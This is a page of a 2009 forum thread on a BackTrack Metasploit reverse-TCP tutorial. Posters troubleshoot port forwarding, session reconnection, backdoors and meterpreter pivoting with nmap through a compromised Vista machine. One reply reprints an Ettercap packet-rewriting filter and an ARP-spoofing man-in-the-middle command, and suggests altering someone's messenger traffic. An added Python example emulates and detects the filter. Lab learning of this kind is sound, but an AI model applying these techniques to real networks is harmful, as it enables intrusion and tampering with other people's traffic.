Page 4 of 9
Results 31 to 40 of 90

Thread: Metasploiting for BT3 - Reverse TCP

  1. #31 kazalku (Member, Join Date: Feb 2009)


    Quote Originally Posted by phoenix910:
    Glad you liked it. All your methodology is correct (just make sure that you run it with administrative permissions in Vista to assure that all functions are available). The only thing you'll need to do is set up port forwarding on You will need to go to the router setup page and make sure any external connection attempts to 5555 are sent to the local IP port 5555 of the BT3 box. Then all should connect fine. For specific port forwarding instructions for your router model, visit

    Marvelous!!!!!! It worked like a dream. Thank you very much. You are a star.

  2. #32


    Glad to be of help


  3. #33 (Join Date: Jun 2008)


    Thank you very much phoenix910.
    I have some questions:
    1) I read that I have to use a high port number: I used 5555 and it works perfectly on my LAN, but when I use for example port 80, 100, 500... I get no positive response (are all the payloads used for high ports only? For example, if I have an outgoing firewall filter for high port numbers, what should I do?)

    2) When I connect successfully to my PC, for example, and for some reason there is a disconnection between these 2 PCs, is there any trick to reconnect to it without re-opening output.exe on the PC? (without the usage of netcat)


  4. #34


    In theory, any port that isn't being used by either OS should work - however, 80 is often used, as you figured in your example. My advice would be to just modify your firewall's security settings.

    And no, unless you've installed a backdoor, there isn't any way to reconnect once you've disconnected - unless the disconnection is between you and a remote shell, and the actual metasploit session stays open; in which case, you can just re-start interaction with that particular session. But if the disconnection happens between server and client, then unless you've installed some form of backdoor (be it user account, remote shell, etc.), you won't be able to get back in without running the executable.


  5. #35 kazalku (Member, Join Date: Feb 2009)


    Quote Originally Posted by phoenix910:
    Let's say we couldn't reach the server ( from the outside, but because we have a shell, we have a chance to exploit it. Let's add the route as stated before:
    meterpreter > ^Z
    Background session 1? [y/N] y
    msf exploit(handler) > route add 1
    msf exploit(handler) > route print

    Active Routing Table

    Subnet Netmask Gateway
    ------ ------- ------- Session 1
    Now, we simply need to execute our Nmap scan, and after that, analyse the vulnerabilities, and exploit the server the same way you would any other host. For this scan, I did something very quick and basic, but you can specify it however you like:
    msf exploit (handler) > nmap -sS -sV -T 5 -P0 -O

    In my case, is remote router... I did this:
    meterpreter > route

    Network routes

    Subnet Netmask Gateway
    ------ ------- -------

    meterpreter >
    Background session 2? [y/N]
    msf exploit(handler) > route add 2
    msf exploit(handler) > route print

    Active Routing Table

    Subnet Netmask Gateway
    ------ ------- ------- Session 2

    msf exploit(handler) > nmap -sS -sV -T 5 -P0 -O
    [*] exec: nmap -sS -sV -T 5 -P0 -O

    Starting Nmap 4.85BETA3 ( ) at 2009-03-11 23:25 GMT
    Interesting ports on
    Not shown: 996 filtered ports
    23/tcp open telnet?
    53/tcp open domain?
    80/tcp open http?
    5000/tcp open upnp?
    MAC Address: 00:22:3F:B5:0B0 (Netgear)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: WAP|switch
    Running: Actiontec Linux 2.4.X, HP embedded, Linksys embedded, Netgear embedded
    OS details: HP Brocade 4100 switch; or Actiontec MI-424-WR, Linksys WRVS4400N, or Netgear WNR834B wireless broadband router
    Network Distance: 1 hop

    OS and Service detection performed. Please report any incorrect results at http: // .
    Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
    msf exploit(handler) >
    However, 00:22:3F:B5:0B0 is the router belonging to the BT3 box, NOT to the compromised Vista box. Any idea what's going wrong here?

  6. #36


    You need it to be on a separate local IP range, as far as I'm aware, otherwise you'll end up scanning yourself.


  7. #37 Mortifix (Member, Join Date: Nov 2006)


    Wow great tutorial!! I am interested in the Ettercap portion of the article. Do you have any other guides about filters you have created using ettercap?
    I hate Google.

  8. #38


    Well, I haven't written any majorly different guides specifically on that, only another similar explanation from a previous tutorial:

    Manipulating the Packets:
    The possibilities of packet manipulation are endless, bound only by your creativity and the time you are willing to spend exploring the different protocols, how they work, and their relations with inbound traffic and outbound traffic on the network. Ettercap comes with its own built-in filter creator, as well as a few of its own pre-made packets. Building your own filter requires a basic knowledge of how programming languages work, or the ability to analyse and determine how the Ettercap filters work, which is relatively simple if you are used to analysing data/packet streams with programs such as Wireshark. Open a new console, and type:
    bt ~ # kedit filter.pic
    Then copy and paste the following into the window that comes up:
    # Outbound web requests: rewrite the Accept-Encoding header name.
    # Both strings are 15 characters, so the packet length does not change.
    # DATA.data is Ettercap's name for the packet payload.
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            msg("Modified Accept-Encoding!\n");
        }
    }
    # Inbound web replies: point every image tag at your own picture.
    # Put the URL of the replacement image between the escaped quotes.
    if (ip.proto == TCP && tcp.src == 80) {
        replace("img src=", "img src=\"\" ");
        replace("IMG SRC=", "img src=\"\" ");
        msg("Replaced the picture.\n");
    }
    if (ip.proto == UDP && udp.src == 80) {
        replace("img src=", "img src=\"\" ");
        replace("IMG SRC=", "img src=\"\" ");
        msg("Replaced the picture.\n");
    }
    <-snapshot7.png-> Caption: Image Replacement in Action
    Save this, and then close Kedit. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:
    bt ~ # etterfilter filter.pic -o filter.ef
    You will see a few things happen, and then the filter will be created. Basically, the code is fairly simple. The "if (ip.proto == TCP && tcp.dst/src == 80)" basically tells Ettercap to only pay attention to the TCP protocol packets on either the destination to port 80, or the source from port 80 (which is all web related traffic), and then to follow the instructions that come after that, being to search that packet for a string, then replace it with what you would like that string to read. You will also notice that in replacing the strings, we must keep the length of the two strings the same; be careful to make sure you do this, or it won't work. Now to make this filter run during your MiTM attack, we must use a slightly altered Ettercap command. The command to use is (assuming you saved the filter in the /root folder):
    bt ~ # sudo ettercap -T -q -F filter.ef -M arp:remote /$IP/ -P autoadd
    Now move to another computer, navigate to a website, and see a lot of pictures being replaced with the image you specified! This can be quite funny. Alternatively, you can see the images being replaced by watching the output of your console session. The filter we created won't work with absolutely every website because of the many various ways of including images, but it will work with many of them.
    Applying this same principle, you can for example figure out the port of a Messenger program, and modify the outgoing packets to include words of your own, for example replacing something like "How are you" with something like "I hate you!" (notice still the same amount of characters; this is essential in general packet manipulation, however, it is not necessary in our image filter, as we are adding to what is already there [via the use of the slashes], not modifying). Explore, and have fun with this.
    But that's from one of my other Ettercap-related articles. If you want more specific stuff, take a look at the structure of that, and the packets you want to manipulate, and write your own, or Google search around a bit for other examples.
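An added example in Python, not from the thread or from phoenix910's article: it emulates the quoted filter's replace() calls on constructed HTTP payloads, shows why the same-length rule matters, and gives the server-side check that spots the Accept-Rubbish! header this filter leaves in every rewritten request. REPLACEMENT_URL stands in for the image address that was stripped from the post.

```python
# Added example: emulates the quoted Ettercap filter on constructed HTTP
# payloads and shows how the rewrite can be spotted server-side. Not code
# from the thread or from phoenix910's article; all packets are constructed.

ACCEPT_ENCODING = b"Accept-Encoding"
ACCEPT_RUBBISH = b"Accept-Rubbish!"   # same 15 bytes, as the filter rule requires


def ettercap_replace(payload, old, new, strict=True):
    """Mimic the filter's replace(): swap every `old` for `new` in the payload.
    strict=True enforces the same-length rule the post insists on for general
    packet manipulation: the payload size stays unchanged, so the TCP sequence
    numbers the two endpoints expect still line up."""
    if strict and len(old) != len(new):
        raise ValueError("replacement must keep length: %d != %d" % (len(old), len(new)))
    return payload.replace(old, new)


def apply_filter(payload, src_port, dst_port, image_url=b"REPLACEMENT_URL"):
    """Apply the quoted filter to one TCP payload. image_url is a placeholder
    for the picture address that the forum software stripped from the post."""
    if dst_port == 80 and ACCEPT_ENCODING in payload:
        # Corrupting the header name makes the server answer uncompressed,
        # so the HTML comes back as plain text the image rule can match.
        payload = ettercap_replace(payload, ACCEPT_ENCODING, ACCEPT_RUBBISH)
    if src_port == 80:
        new_tag = b'img src="' + image_url + b'" '
        # This rule grows the packet, so it is deliberately not strict.
        payload = ettercap_replace(payload, b"img src=", new_tag, strict=False)
        payload = ettercap_replace(payload, b"IMG SRC=", new_tag, strict=False)
    return payload


def tampering_indicators(request):
    """Server-side check: no browser sends a header named Accept-Rubbish!, so
    finding it in a request means an in-path filter like this one rewrote the
    client's traffic. Returns the list of indicators found."""
    head = request.split(b"\r\n\r\n", 1)[0]
    names = set()
    for line in head.split(b"\r\n")[1:]:        # skip the request line
        if b":" in line:
            names.add(line.split(b":", 1)[0].strip().lower())
    found = []
    if ACCEPT_RUBBISH.lower() in names:
        found.append("accept-rubbish header present")
    return found
```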


  9. #39 Just burned his ISO (Join Date: Oct 2008)


    phoenix910 thanks for the articles you posted,great work!

  10. #40


    Quote Originally Posted by coool:
    Nice, thanks.

    But I tested this code and nothing happened.

    It shows me the error:
    [-] Invalid format: exe
    MSF version 3.2, and the update seems to be the problem. Can you tell me how I can solve this problem?
    Interesting, I got the same thing. Just burned the .iso a few days back off the main site. Any ideas on this? Exact same error. Thank you for the great writeup. Already learned a few new things.

